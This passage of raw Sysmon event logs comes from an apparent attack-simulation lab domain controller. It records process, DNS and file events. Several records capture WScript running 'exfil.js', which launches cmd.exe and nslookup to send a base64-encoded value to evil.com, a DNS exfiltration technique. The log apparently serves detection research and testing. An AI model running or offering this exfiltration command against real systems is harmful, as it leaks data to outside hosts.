indows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212981Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.370{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F7-629A-4545-000000005F02}1188C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212980Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.354{2E1864BB-18F7-629A-4345-000000005F02}53324176C:\Windows\system32\cmd.exe{2E1864BB-18F7-629A-4545-000000005F02}1188C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000212979Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.370{2E1864BB-18F7-629A-4545-000000005F02}1188C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A SVB2NjogZmU4MDo6ZmMwMzpjOWUyOmIwNjg6OWY3MQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F7-629A-4345-000000005F02}5332C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A SVB2NjogZmU4MDo6ZmMwMzpjOWUyOmIwNjg6OWY3MQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlfudg.tmp 2>&1 23542300x8000000000000000212978Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.354{2E1864BB-E1BD-6299-A700-000000005F02}4700NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=88764E49A9DB40FAC84C143D55B11D16,SHA256=B6040902613D67A5E021D6B0ACAF400FECE55CE1FD86E9E8FC5C745130E83807,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000212977Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.308{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18F7-629A-4445-000000005F02}7412C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212976Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.308{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F7-629A-4445-000000005F02}7412C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212975Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.308{2E1864BB-18F7-629A-4445-000000005F02}74128160C:\Windows\system32\conhost.exe{2E1864BB-18F7-629A-4345-000000005F02}5332C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212974Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.292{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F7-629A-4445-000000005F02}7412C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212973Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.292{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212972Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.292{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212971Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.292{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212970Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.292{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212969Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.292{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F7-629A-4345-000000005F02}5332C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212968Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.292{2E1864BB-18E0-629A-6742-000000005F02}39766336C:\Windows\System32\WScript.exe{2E1864BB-18F7-629A-4345-000000005F02}5332C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000212967Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.295{2E1864BB-18F7-629A-4345-000000005F02}5332C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A SVB2NjogZmU4MDo6ZmMwMzpjOWUyOmIwNjg6OWY3MQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlfudg.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 354300x8000000000000000212966Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.723{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51047- 354300x8000000000000000212965Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.720{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51046- 354300x8000000000000000212964Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.720{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51045- 354300x8000000000000000212963Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.720{00000000-0000-0000-0000-000000000000}1220<unknown process>-udptruefalse127.0.0.1-51045-false127.0.0.1-53domain 354300x8000000000000000212962Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.658{00000000-0000-0000-0000-000000000000}2088<unknown process>-udpfalsefalse127.0.0.1-51044-false127.0.0.1-53domain 354300x8000000000000000212961Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.658{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51044- 354300x8000000000000000212960Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.658{00000000-0000-0000-0000-000000000000}2088<unknown process>-udpfalsefalse127.0.0.1-51043-false127.0.0.1-53domain 354300x8000000000000000212959Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.658{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51043- 354300x8000000000000000212958Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.657{00000000-0000-0000-0000-000000000000}2088<unknown process>-udptruefalse127.0.0.1-51043-false127.0.0.1-53domain 354300x8000000000000000212957Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.657{00000000-0000-0000-0000-000000000000}2088<unknown process>-udpfalsefalse127.0.0.1-51042-false127.0.0.1-53domain 354300x8000000000000000212956Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.657{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51042- 354300x8000000000000000212955Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.657{00000000-0000-0000-0000-000000000000}2088<unknown process>-udptruefalse127.0.0.1-51042-false127.0.0.1-53domain 354300x8000000000000000212954Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.580{00000000-0000-0000-0000-000000000000}6652<unknown process>-udpfalsefalse127.0.0.1-51041-false127.0.0.1-53domain 354300x8000000000000000212953Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.580{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51041- 354300x8000000000000000212952Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.580{00000000-0000-0000-0000-000000000000}6652<unknown process>-udptruefalse127.0.0.1-51041-false127.0.0.1-53domain 354300x8000000000000000212951Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.580{00000000-0000-0000-0000-000000000000}6652<unknown process>-udpfalsefalse127.0.0.1-51040-false127.0.0.1-53domain 354300x8000000000000000212950Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.580{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51040- 354300x8000000000000000212949Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.580{00000000-0000-0000-0000-000000000000}6652<unknown process>-udptruefalse127.0.0.1-51040-false127.0.0.1-53domain 354300x8000000000000000212948Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.579{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51039- 354300x8000000000000000212947Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.579{00000000-0000-0000-0000-000000000000}6652<unknown process>-udptruefalse127.0.0.1-51039-false127.0.0.1-53domain 354300x8000000000000000212946Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.502{00000000-0000-0000-0000-000000000000}3300<unknown process>-udpfalsefalse127.0.0.1-51038-false127.0.0.1-53domain 354300x8000000000000000212945Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.502{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51038- 354300x8000000000000000212944Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.502{00000000-0000-0000-0000-000000000000}3300<unknown process>-udptruefalse127.0.0.1-51038-false127.0.0.1-53domain 354300x8000000000000000212943Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.502{00000000-0000-0000-0000-000000000000}3300<unknown process>-udpfalsefalse127.0.0.1-51037-false127.0.0.1-53domain 354300x8000000000000000212942Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.502{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51037- 354300x8000000000000000212941Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.502{00000000-0000-0000-0000-000000000000}3300<unknown process>-udptruefalse127.0.0.1-51037-false127.0.0.1-53domain 23542300x8000000000000000212940Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.270{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlvfpfp.tmpMD5=E9933BFC1563034EF92711FFD1FA59E4,SHA256=B289486696E542D49274648AF69BCDC051FA9206A6157EC32F57F8442A56EBEC,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000212939Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.501{00000000-0000-0000-0000-000000000000}3300<unknown process>-udpfalsefalse127.0.0.1-51036-false127.0.0.1-53domain 354300x8000000000000000212938Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.501{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51036- 354300x8000000000000000212937Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.501{00000000-0000-0000-0000-000000000000}3300<unknown process>-udptruefalse127.0.0.1-51036-false127.0.0.1-53domain 354300x8000000000000000212936Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.406{00000000-0000-0000-0000-000000000000}5404<unknown process>-udpfalsefalse127.0.0.1-51035-false127.0.0.1-53domain 354300x8000000000000000212935Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.405{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51035- 354300x8000000000000000212934Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.405{00000000-0000-0000-0000-000000000000}5404<unknown process>-udptruefalse127.0.0.1-51035-false127.0.0.1-53domain 354300x8000000000000000212933Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.338{00000000-0000-0000-0000-000000000000}8012<unknown process>-udpfalsefalse127.0.0.1-51034-false127.0.0.1-53domain 354300x8000000000000000212932Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.926{00000000-0000-0000-0000-000000000000}3236<unknown process>-udptruefalse127.0.0.1-51018-false127.0.0.1-53domain 354300x8000000000000000212931Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.926{00000000-0000-0000-0000-000000000000}3236<unknown process>-udpfalsefalse127.0.0.1-51017-false127.0.0.1-53domain 354300x8000000000000000212930Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.925{00000000-0000-0000-0000-000000000000}3236<unknown process>-udptruefalse127.0.0.1-51016-false127.0.0.1-53domain 354300x8000000000000000212929Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.862{00000000-0000-0000-0000-000000000000}1368<unknown process>-udpfalsefalse127.0.0.1-51015-false127.0.0.1-53domain 354300x8000000000000000212928Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.862{00000000-0000-0000-0000-000000000000}1368<unknown process>-udpfalsefalse127.0.0.1-51014-false127.0.0.1-53domain 354300x8000000000000000212927Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.862{00000000-0000-0000-0000-000000000000}1368<unknown process>-udptruefalse127.0.0.1-51014-false127.0.0.1-53domain 354300x8000000000000000212926Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.861{00000000-0000-0000-0000-000000000000}1368<unknown process>-udpfalsefalse127.0.0.1-51013-false127.0.0.1-53domain 354300x8000000000000000212925Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.861{00000000-0000-0000-0000-000000000000}1368<unknown process>-udptruefalse127.0.0.1-51013-false127.0.0.1-53domain 10341000x8000000000000000212924Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.255{2E1864BB-18F7-629A-4145-000000005F02}26685400C:\Windows\system32\conhost.exe{2E1864BB-18F7-629A-4245-000000005F02}2824C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212923Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.255{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F7-629A-4245-000000005F02}2824C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212922Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.255{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212921Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.255{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212920Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.255{2E1864BB-18F7-629A-4045-000000005F02}61164708C:\Windows\system32\cmd.exe{2E1864BB-18F7-629A-4245-000000005F02}2824C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212919Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 